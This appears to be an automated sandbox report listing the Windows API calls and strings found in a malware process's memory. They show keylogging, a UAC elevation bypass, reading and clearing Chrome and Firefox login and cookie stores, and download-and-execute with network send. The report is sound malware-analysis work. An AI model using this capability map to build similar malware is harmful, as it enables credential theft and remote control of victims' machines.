• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
• String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$RG
• API String ID: 3756808967-4270599879
• Opcode ID: f5140d914c5819211218b59f29845687241db36a24a788e1bd0b27517d468fe6
• Instruction ID: f7ffc7f0dfbd756cb6275d6ec2ba0be94116b78c8c9f611e281f0170cc986b4a
• Opcode Fuzzy Hash: f5140d914c5819211218b59f29845687241db36a24a788e1bd0b27517d468fe6
• Instruction Fuzzy Hash: 4C7130705083419AC724FB21D8559AEB7E4AF90348F40483FF586631E3EF79994DCB9A
Strings
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID:
• String ID: 0$1$2$3$4$5$6$7
• API String ID: 0-3177665633
• Opcode ID: 49f4933aa84a896eb8c39cf471aa4ec6f5a3d30c1b635cd71b5a616930add701
• Instruction ID: 3c74f5afe55031bef20d6cb4aa2bc38f0c43463ce83be6e36937eb537edf8bdf
• Opcode Fuzzy Hash: 49f4933aa84a896eb8c39cf471aa4ec6f5a3d30c1b635cd71b5a616930add701
• Instruction Fuzzy Hash: CB71E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
APIs
• GetForegroundWindow.USER32(?,?,00475100), ref: 0040A451
• GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
• GetKeyboardLayout.USER32(00000000), ref: 0040A464
• GetKeyState.USER32(00000010), ref: 0040A46E
• GetKeyboardState.USER32(?,?,00475100), ref: 0040A479
• ToUnicodeEx.USER32(00475154,?,?,?,00000010,00000000,00000000), ref: 0040A49C
• ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
• ToUnicodeEx.USER32(00475154,?,?,?,00000010,00000000,00000000), ref: 0040A535
Strings
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
• String ID: (kG
• API String ID: 1888522110-2813241365
• Opcode ID: 79348ff8eaa35f6faedaca36de41c7c480938a272048c625dc6fe4e82d71162d
• Instruction ID: 3b9a32d10988b9101c987d3e8fcb44953e801c6634267c48ca941b3c69dca571
• Opcode Fuzzy Hash: 79348ff8eaa35f6faedaca36de41c7c480938a272048c625dc6fe4e82d71162d
• Instruction Fuzzy Hash: F8316D72504308BFD700DFA0DC45F9B7BECAB88754F00083AB645D61A0D7B5E948CBA6
APIs
• _wcslen.LIBCMT ref: 0040755C
• CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
Strings
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: Object_wcslen
• String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
• API String ID: 240030777-3166923314
• Opcode ID: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
• Instruction ID: 28daeeabb8f9d0779e909056d36d27ae9c6096be3406941992b1a3e854751cf1
• Opcode Fuzzy Hash: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
• Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
APIs
• OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758F8), ref: 0041A7EF
• EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
• GetLastError.KERNEL32 ref: 0041A84C
• EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: EnumServicesStatus$ErrorLastManagerOpen
• String ID:
• API String ID: 3587775597-0
• Opcode ID: 8a09e391cf35051e339281d2a4b7d01a54059c7697b547b8b8149822d0e6778f
• Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
• Opcode Fuzzy Hash: 8a09e391cf35051e339281d2a4b7d01a54059c7697b547b8b8149822d0e6778f
• Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A
APIs
• FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
• FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
• FindClose.KERNEL32(00000000), ref: 0040C4B8
• FindClose.KERNEL32(00000000), ref: 0040C4E3
Strings
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: Find$CloseFile$FirstNext
• String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
• API String ID: 1164774033-405221262
• Opcode ID: e90d06a8ec93e69e400289d3d5a4f788ee45a56a67685538a4b9ff5dd8d84a81
• Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
• Opcode Fuzzy Hash: e90d06a8ec93e69e400289d3d5a4f788ee45a56a67685538a4b9ff5dd8d84a81
• Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C37D
                                                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C3AD
                                                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C41F
                                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C42C
                                                                                                  • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C402
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C44D
                                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C463
                                                                                                • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C46A
                                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,004752E8,00475300,00000001), ref: 0041C473
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                • String ID:
                                                                                                • API String ID: 2341273852-0
                                                                                                • Opcode ID: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                                                                • Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
                                                                                                • Opcode Fuzzy Hash: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                                                                • Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
                                                                                                APIs
                                                                                                • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140D8
                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140E4
                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004142A5
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                                • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                                • API String ID: 2127411465-314212984
                                                                                                • Opcode ID: f0dc0ac158a4597904f9d4bd83d4ea492494a4f5769bb014f944d07396ae78d4
                                                                                                • Instruction ID: cc57822c2a7f940fffebe33daf0632284ddc1748a3b8d5e961f42c670a34d5b4
                                                                                                • Opcode Fuzzy Hash: f0dc0ac158a4597904f9d4bd83d4ea492494a4f5769bb014f944d07396ae78d4
                                                                                                • Instruction Fuzzy Hash: D1B1F671A0430066CA14BB76DC579AF36A89F91748F40053FB906671E2EE7D8A48C6DA
                                                                                                APIs
                                                                                                  • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                                                  • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                                                  • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                                                  • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                                                                  • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                                                                                                • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                                                                                                • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 004168A6
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                • String ID: !D@$PowrProf.dll$SetSuspendState
                                                                                                • API String ID: 1589313981-2876530381
                                                                                                • Opcode ID: 4bd10a5f799b95ac4237c352870c0353e076f464d26d690b152e3588c70e8aba
                                                                                                • Instruction ID: 272f3f60014ab8f8f2fa2781f50e1ac7d9ab3f628c5d0f86ef79d7992e461550
                                                                                                • Opcode Fuzzy Hash: 4bd10a5f799b95ac4237c352870c0353e076f464d26d690b152e3588c70e8aba
                                                                                                • Instruction Fuzzy Hash: D821B17060430166CA14FBB28856ABF36599F41388F41087FB501671D2EF3DD845C76E
                                                                                                APIs
                                                                                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                                                                                                • GetLastError.KERNEL32 ref: 0040BA93
                                                                                                Strings
                                                                                                • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                                                                                                • [Chrome StoredLogins not found], xrefs: 0040BAAD
                                                                                                • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                                                                                                • UserProfile, xrefs: 0040BA59
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DeleteErrorFileLast
                                                                                                • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                • API String ID: 2018770650-1062637481
                                                                                                • Opcode ID: 0e12c434a704d568d93f0e9ae73d02a011f2f49309dc381e150468c0f0ecafbd
                                                                                                • Instruction ID: 0532e36a1aab116e50a9f1d1704ee325f44086adb43c50cfffb7bf5285f9a594
                                                                                                • Opcode Fuzzy Hash: 0e12c434a704d568d93f0e9ae73d02a011f2f49309dc381e150468c0f0ecafbd
                                                                                                • Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                                                                • GetLastError.KERNEL32 ref: 004179D8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                • String ID: SeShutdownPrivilege
                                                                                                • API String ID: 3534403312-3733053543
                                                                                                • Opcode ID: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                                                                • Instruction ID: 35ac2027e355ce869dd6e937a138cd84cb59798e299a7bc9dfe05b1c572390d3
                                                                                                • Opcode Fuzzy Hash: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                                                                • Instruction Fuzzy Hash: 38F03A71802229FBDB10ABA1EC4DAEF7FBCEF05612F100465B909A1152D7348E04CBB5
                                                                                                APIs
                                                                                                • __EH_prolog.LIBCMT ref: 00409293
                                                                                                  • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                                                                                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                                                                                                • FindClose.KERNEL32(00000000), ref: 004093FC
                                                                                                  • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                                                  • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                                                  • Part of subcall function 00404E26: CloseHandle.KERNELBASE(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                                                                                • FindClose.KERNEL32(00000000), ref: 004095F4
                                                                                                  • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474F08,?), ref: 00404B47
                                                                                                  • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474F08,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                                                                • String ID:
                                                                                                • API String ID: 1824512719-0
                                                                                                • Opcode ID: cfd56bb2f0bafcfd4d7d26af1d1556629142b5e3114abe265a3ae1cdad786b8f
                                                                                                • Instruction ID: 7a56ba3823c44b8d3dadbfeca74e3365e00ee059376cf1b582d15bdd70b30780
                                                                                                • Opcode Fuzzy Hash: cfd56bb2f0bafcfd4d7d26af1d1556629142b5e3114abe265a3ae1cdad786b8f
                                                                                                • Instruction Fuzzy Hash: 8AB19D32900109AACB14EBA1DD92AEDB379AF44314F50417FF506B60E2EF785F49CB59
                                                                                                APIs
                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                                                                                                • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                                • String ID:
                                                                                                • API String ID: 276877138-0
                                                                                                • Opcode ID: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                                                                                • Instruction ID: 14dbf03deabb1432b93a26d2ddf90514dbbc411f15d31c7908333a88c2a5d316
                                                                                                • Opcode Fuzzy Hash: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                                                                                • Instruction Fuzzy Hash: FEF0E971141225AFD2115B209C88DFF276CDF85B66B00082AF901921919B68CC45E579
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                                                                                                • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                                                                                                  • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$Find$CreateFirstNext
                                                                                                • String ID: HSG$`XG$`XG
                                                                                                • API String ID: 341183262-3993355375
                                                                                                • Opcode ID: 9c9a0669a71b4f33c5daa822f8c57c44e5966a1ff3984ab844f5db61bfc19107
                                                                                                • Instruction ID: 3e2b8d556a8fbdbb081ab446324185a4f3aab8361380fbf0113865ad31d0729a
                                                                                                • Opcode Fuzzy Hash: 9c9a0669a71b4f33c5daa822f8c57c44e5966a1ff3984ab844f5db61bfc19107
                                                                                                • Instruction Fuzzy Hash: 588151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                                                                                APIs
                                                                                                • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 00452555
                                                                                                • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 0045257E
                                                                                                • GetACP.KERNEL32 ref: 00452593
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InfoLocale
                                                                                                • String ID: ACP$OCP
                                                                                                • API String ID: 2299586839-711371036
                                                                                                • Opcode ID: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                                                                • Instruction ID: 097c3b5166b2d36aca1cb621bb06e922528e2ea4561953c90108b9915aa2a338
                                                                                                • Opcode Fuzzy Hash: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                                                                • Instruction Fuzzy Hash: 7E21F932600108B6D734CF14CA10A9B73A6EB16B53B564467ED09D7312F7B6DD44C398
APIs
• FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B54A
• LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
• LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
• SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
Strings
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: Resource$FindLoadLockSizeof
• String ID: SETTINGS
• API String ID: 3473537107-594951305
• Opcode ID: 7e39093ddf5dcb720cd3caccf1e1277dc2c4d9143844da5a4d70bf483eb1c798
• Instruction ID: e87eb13c1a863bb520e8110b03cd0e44f0123e9e346c2db4eb51eb31bea7c0b5
• Opcode Fuzzy Hash: 7e39093ddf5dcb720cd3caccf1e1277dc2c4d9143844da5a4d70bf483eb1c798
• Instruction Fuzzy Hash: 23E01276600B21EBDB211FB1AC8CD467F25E7C9B533140075FA0582271CB758840DA58
APIs
• __EH_prolog.LIBCMT ref: 004096A5
• FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
• FindNextFileW.KERNEL32(00000000,?), ref: 00409746
• FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: Find$File$CloseFirstH_prologNext
• String ID:
• API String ID: 1157919129-0
• Opcode ID: af6a0ae420fa4b0c531d5284d970621d696702494a03b6a4d54f92d75e0779a6
• Instruction ID: 095255599cc0af9be2c5710cd9f248f54336688560ad7ccdcde9a73cf5c292f5
• Opcode Fuzzy Hash: af6a0ae420fa4b0c531d5284d970621d696702494a03b6a4d54f92d75e0779a6
• Instruction Fuzzy Hash: CB813C729001099BCB15EBA2DC969EDB378AF14318F10417FE506B71E2EF789E49CB58
APIs
  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
• GetUserDefaultLCID.KERNEL32 ref: 0045279C
• IsValidCodePage.KERNEL32(00000000), ref: 004527F7
• IsValidLocale.KERNEL32(?,00000001), ref: 00452806
• GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
• GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 0045286D
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
• String ID:
• API String ID: 745075371-0
• Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
• Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
• Opcode Fuzzy Hash: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
• Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
APIs
• __EH_prolog.LIBCMT ref: 0040884C
• FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
• __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
• FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
• FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: Find$File$CloseException@8FirstH_prologNextThrow
• String ID:
• API String ID: 1771804793-0
• Opcode ID: 6a5add45ef859563d959a98ce479c279f9ec06b8e0bd107cefd8dc89a421ab56
• Instruction ID: 967e03bdddb214c30410211942a515ee3c29859e80101891d5c5db132fd2cd64
• Opcode Fuzzy Hash: 6a5add45ef859563d959a98ce479c279f9ec06b8e0bd107cefd8dc89a421ab56
• Instruction Fuzzy Hash: 94517F72900209AACB04FB65DD569ED7778AF10308F50417FB906B71E2EF389B49CB99
APIs
• ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
• URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
Strings
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: DownloadExecuteFileShell
• String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$open
• API String ID: 2825088817-2881483049
• Opcode ID: a4decb2415a0649306c596a711eb8ba019e5cb9b1f344aa0c5d0a38af2be72d2
• Instruction ID: e12f74d6213dd3660153607da8c9b98f7978e2d251169c1aa1e307be856b925d
• Opcode Fuzzy Hash: a4decb2415a0649306c596a711eb8ba019e5cb9b1f344aa0c5d0a38af2be72d2
• Instruction Fuzzy Hash: 1461C471A0830166CA14FB76C8569BE37A59F81758F40093FF9427B2D2EE3C9905C79B
APIs
• FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
• FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
Strings
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: FileFind$FirstNextsend
• String ID: hPG$hPG
• API String ID: 4113138495-4177492676
• Opcode ID: 1be34f89ea814bd65e76ce40df8d3f913d103fba2d245ec84d986e5d9032f1e8
• Instruction ID: abfa5a3658aec55442980c0effbd4670719d50d4d7308f226e3cac976b3f196c
• Opcode Fuzzy Hash: 1be34f89ea814bd65e76ce40df8d3f913d103fba2d245ec84d986e5d9032f1e8
• Instruction Fuzzy Hash: CB2195315082019BC314FB61D895CEFB3ACAF90358F40493EF696620E1FF78AA09C65B
APIs
• SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
  • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
